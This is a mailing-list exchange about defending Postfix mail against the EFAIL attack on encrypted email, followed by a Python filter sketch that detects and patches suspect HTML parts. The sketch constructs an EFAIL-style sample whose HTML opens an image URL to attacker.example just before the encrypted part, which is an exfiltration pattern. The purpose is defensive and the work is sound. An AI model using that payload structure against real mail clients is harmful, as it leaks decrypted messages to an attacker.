On 02-07-18 01:15, Dr. Rolf Jansen wrote:
> Hello,
>
> I read carefully the technical paper about the exfiltration attack
> (efail) on decrypted S/MIME or PGP content.
>
> https://efail.de
> https://efail.de/efail-attack-paper.pdf
>
> According to my understanding, sanitizing text/html content to a certain
> extent in the mail body should mitigate the attack. Since the e-mail
> sender may send an encrypted message to a number of receivers at the
> same time, who are not necessarily all behind our Postfix server, the
> mitigation would be partial from the sender's point of view, but should
> be complete on the receiver's side getting sanitized HTML content only.
>
> I am planning to write an after-queue content filter. Full HTML
> sanitizing is out of the scope at the moment, however, inserting the
> four character sequence '>"> (in words: single-quote, greater,
> double-quote, greater) right at the end of a text/html multipart, which
> is directly followed by an application/pkcs7-mime part should be
> sufficient to close the ef-attack vector. BASE64 transfer encoded HTML
> needs to be decoded before, of course.
>
> Does this sound reasonable?

I'm not certain that inserting '>"> will help. If you can insert
arbitrary characters, the attacker might also be able to "escape" your
escape sequence.

I did some analysis of EFAIL for S/MIME. The option we implemented was
to add some detection for EFAIL and possibly refuse to decrypt if EFAIL
was detected. See for more info:

https://www.ciphermail.com/blog/efail-detection-and-prevention.html

> Did somebody write this kind of a filter already and would be ready to
> share it with others?

You might try CipherMail (https://www.ciphermail.com/gateway.html)

> If not, I will start the work in the course of this week. Any comments
> are welcome.
>
> Once the filter is working, I would only need to ask my peers not to Cc,
> Bcc, and/or mail-To encrypted messages to other parties at the same
> time, at least until most of the e-mail clients sanitize HTML mails
> internally - which may take a while, though.

We spent quite some time trying to attack mail clients with the EFAIL
S/MIME attack. Even though inserting data into the stream is easy, we
haven't been able to actually misuse Outlook. Outlook is a picky email
client and refuses to decrypt email if not all things are exactly
correct.

Allowing characters to be inserted into an encrypted stream is a serious
issue. However, I think that in practical cases, attacking S/MIME on
Outlook is not easy (or not possible at all).

Kind regards,

Martijn Brinkers
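The sketch below is an added example, not code from either poster and not CipherMail's detection logic. It implements the rule exactly as Rolf states it: walk the MIME tree, find every text/html part whose immediate next sibling is an application/pkcs7-mime part, decode its transfer encoding, append the four characters '>"> and re-encode as base64. The same sibling scan doubles as a detection signal of the kind Martijn describes (a non-zero hit count is the cue to refuse or quarantine instead of patching). The sample message, the addresses and the "ciphertext" are constructed placeholders; no real CMS data is involved. It only uses the Python standard library.

```python
"""Constructed after-queue filter sketch for the '>"> mitigation discussed
above.  Standard library only.  The sample message is made up and the
'ciphertext' is a placeholder, not real CMS enveloped data."""
import sys
from email import message_from_bytes, policy
from email.message import EmailMessage

# Four characters appended to the HTML part: close a single-quoted
# attribute and its tag, then a double-quoted attribute and its tag.
CLOSER = "'>\">"


def find_efail_suspects(msg):
    """Return every text/html part that is the immediate sibling before an
    application/pkcs7-mime part, anywhere in the MIME tree.  A non-empty
    result is the detection signal; sanitize() patches these parts.
    HTML nested inside a multipart/alternative that precedes the encrypted
    part is deliberately not matched (Rolf's rule only names siblings)."""
    hits = []

    def walk(container):
        parts = list(container.iter_parts())
        for i, part in enumerate(parts):
            if part.is_multipart():
                walk(part)
                continue
            nxt = parts[i + 1] if i + 1 < len(parts) else None
            if (part.get_content_type() == "text/html"
                    and nxt is not None
                    and nxt.get_content_type() == "application/pkcs7-mime"):
                hits.append(part)

    if msg.is_multipart():
        walk(msg)
    return hits


def sanitize(raw):
    """Parse raw RFC 5322 bytes, append CLOSER to each suspect HTML part
    (transfer encoding and charset are undone by get_content(), then the
    part is re-encoded as base64) and return (sanitized bytes, parts patched)."""
    msg = message_from_bytes(raw, policy=policy.default)
    suspects = find_efail_suspects(msg)
    for part in suspects:
        html = part.get_content()
        part.set_content(html + CLOSER, subtype="html",
                         charset="utf-8", cte="base64")
    return msg.as_bytes(), len(suspects)


def build_sample():
    """Constructed EFAIL-style message: an HTML part opens <img src="... right
    before the encrypted part and a second HTML part closes it afterwards."""
    msg = EmailMessage()
    msg["From"] = "attacker@attacker.example"      # placeholder address
    msg["To"] = "victim@victim.example"            # placeholder address
    msg["Subject"] = "constructed EFAIL-style sample"
    msg.make_mixed()

    head = EmailMessage()
    head.set_content('<img src="http://attacker.example/',
                     subtype="html", cte="base64")
    msg.attach(head)

    enc = EmailMessage()
    enc.set_content(b"PLACEHOLDER, NOT REAL CMS ENVELOPED DATA",
                    maintype="application", subtype="pkcs7-mime",
                    cte="base64",
                    params={"smime-type": "enveloped-data",
                            "name": "smime.p7m"})
    msg.attach(enc)

    tail = EmailMessage()
    tail.set_content('">', subtype="html", cte="base64")
    msg.attach(tail)
    return msg.as_bytes()


def first_html(raw):
    """Decoded body of the first text/html part, for inspecting results."""
    msg = message_from_bytes(raw, policy=policy.default)
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            return part.get_content()
    return None


if __name__ == "__main__":
    # Pipe usage:  python3 efail_filter.py < in.eml > out.eml
    # With no stdin it runs on the constructed sample instead.
    raw = sys.stdin.buffer.read() if not sys.stdin.isatty() else build_sample()
    out, patched = sys.stdout.buffer, None
    out_bytes, patched = sanitize(raw)
    out.write(out_bytes)
    print(f"patched {patched} text/html part(s)", file=sys.stderr)
```

Run it on the constructed sample and the leading HTML part comes back as `<img src="http://attacker.example/` followed by a line break and `'>">`, so the URL attribute and the img tag are closed before the decrypted part would be appended by the client. The script reads a message on stdin and writes it to stdout, which is the shape a Postfix pipe-based after-queue filter needs; what it does not do is touch HTML that is not a direct sibling of the pkcs7-mime part, nor any non-attribute context (CSS, comments, script), which is the class of cases Martijn's "escape your escape sequence" remark points at.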